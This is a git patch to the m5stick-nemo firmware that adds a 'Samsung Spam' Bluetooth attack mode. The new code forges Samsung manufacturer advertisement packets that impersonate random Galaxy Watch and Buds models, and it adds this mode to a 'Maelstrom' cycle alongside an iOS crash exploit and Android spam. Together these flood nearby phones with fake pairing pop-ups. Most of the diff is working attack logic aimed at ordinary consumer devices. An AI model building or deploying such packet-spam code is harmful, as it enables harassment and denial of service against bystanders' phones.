From 7775469ca5fe32f7d801ef3228aa5b6d4b69b45f Mon Sep 17 00:00:00 2001 From: danny8972 <150498832+danny8972@users.noreply.github.com> Date: Sun, 21 Apr 2024 21:09:37 -0500 Subject: [PATCH] Added Samsung to list of available spams credits to Spooks4576 --- m5stick-nemo.ino | 75 ++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 73 insertions(+), 2 deletions(-) diff --git a/m5stick-nemo.ino b/m5stick-nemo.ino index 64f620d..56d07be 100644 --- a/m5stick-nemo.ino +++ b/m5stick-nemo.ino @@ -235,6 +235,7 @@ bool rstOverride = false; // Reset Button Override. Set to true when navigatin bool sourApple = false; // Internal flag to place AppleJuice into SourApple iOS17 Exploit Mode bool swiftPair = false; // Internal flag to place AppleJuice into Swift Pair random packet Mode bool androidPair = false; // Internal flag to place AppleJuice into Android Pair random packet Mode +bool samsungSpam = true; // Internal flag to place AppleJuice into Samsung Spam random packet Mode bool maelstrom = false; // Internal flag to place AppleJuice into Bluetooth Maelstrom mode bool portal_active = false; // Internal flag used to ensure NEMO Portal exits cleanly bool activeQR = false; @@ -1343,6 +1344,7 @@ MENU btmenu[] = { { "AppleJuice", 0}, { "Swift Pair", 1}, { "Android Spam", 4}, + { "Samsung Spam", 6}, { TXT_SA_CRASH, 2}, { "BT Maelstrom", 3}, }; @@ -1354,6 +1356,7 @@ void btmenu_setup() { swiftPair = false; maelstrom = false; androidPair = false; + samsungSpam = false; rstOverride = true; drawmenu(btmenu, btmenu_size); delay(500); // Prevent switching after menu loads up @@ -1423,6 +1426,14 @@ void btmenu_loop() { isSwitching = true; current_proc = 1; break; + + case 6: + samsungSpam = true; + current_proc = 9; // jump straight to appleJuice Advertisement + rstOverride = false; + isSwitching = true; + DISP.print("Samsung Spam"); + DISP.print(TXT_SEL_EXIT2); } } } @@ -1473,6 +1484,7 @@ void aj_setup(){ sourApple = false; swiftPair = false; maelstrom = false; + samsungSpam = false; rstOverride = true; drawmenu(ajmenu, ajmenu_size); } @@ -1611,7 +1623,7 @@ void aj_adv(){ // Isolating this to its own process lets us take advantage // of the background stuff easier (menu button, dimmer, etc) rstOverride = true; - if (sourApple || swiftPair || androidPair || maelstrom){ + if (sourApple || swiftPair || androidPair || maelstrom || samsungSpam){ delay(20); // 20msec delay instead of ajDelay for SourApple attack advtime = 0; // bypass ajDelay counter } @@ -1698,6 +1710,52 @@ void aj_adv(){ Serial.printf("%02x", packet[i]); } Serial.println(""); + } else if (samsungSpam) { + //Code from https://github.com/Spooks4576/Ghost_ESP/blob/main/src/components/ble_module/ble_module.h + + Serial.print(TXT_AD_SPAM_ADV); + uint8_t packet[15]; + uint8_t i = 0; + int randval = random(1, 2); + + if (randval == 1) + { + uint8_t model = watch_models[rand() % 25].value; + + packet[i++] = 14; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) + packet[i++] = 0x00; // ... + packet[i++] = 0x01; + packet[i++] = 0x00; + packet[i++] = 0x02; + packet[i++] = 0x00; + packet[i++] = 0x01; + packet[i++] = 0x01; + packet[i++] = 0xFF; + packet[i++] = 0x00; + packet[i++] = 0x00; + packet[i++] = 0x43; + packet[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?) + + oAdvertisementData.addData(std::string((char *)packet, 15)); + } + else + { + uint8_t advertisementPacket[] = { + 0x02, 0x01, 0x18, 0x1B, 0xFF, 0x75, 0x00, 0x42, 0x09, 0x81, 0x02, 0x14, + 0x15, 0x03, 0x21, 0x01, 0x09, 0xEF, 0x0C, 0x01, 0x47, 0x06, 0x3C, 0x94, 0x8E, + 0x00, 0x00, 0x00, 0x00, 0xC7, 0x00 + }; + + int randomIndex = rand() % samsung_buds_count; + uint32_t value = buds_models[randomIndex].value; + advertisementPacket[17] = (value >> 24) & 0xFF; + advertisementPacket[18] = (value >> 16) & 0xFF; + advertisementPacket[20] = (value >> 8) & 0xFF; + + oAdvertisementData.addData(std::string((char *)advertisementPacket, 31)); + } } else { Serial.print(TXT_AJ_ADV); if (deviceType >= 18){ @@ -1720,7 +1778,7 @@ void aj_adv(){ #endif } if (check_next_press()) { - if (sourApple || swiftPair || androidPair || maelstrom){ + if (sourApple || swiftPair || androidPair || maelstrom || samsungSpam){ isSwitching = true; current_proc = 16; drawmenu(btmenu, btmenu_size); @@ -1732,6 +1790,8 @@ void aj_adv(){ sourApple = false; swiftPair = false; maelstrom = false; + samsungSpam = false; + androidPair = false; pAdvertising->stop(); // Bug that keeps advertising in the background. Oops. delay(250); } @@ -1868,17 +1928,28 @@ void btmaelstrom_setup(){ void btmaelstrom_loop(){ swiftPair = false; sourApple = true; + androidPair = false; + samsungSpam = true; aj_adv(); if (maelstrom){ swiftPair = true; androidPair = false; sourApple = false; + samsungSpam = false; aj_adv(); } if (maelstrom){ swiftPair = false; androidPair = true; sourApple = false; + samsungSpam = false; + aj_adv(); + } + if (maelstrom){ + swiftPair = false; + androidPair = false; + sourApple = false; + samsungSpam = true; aj_adv(); } if (maelstrom){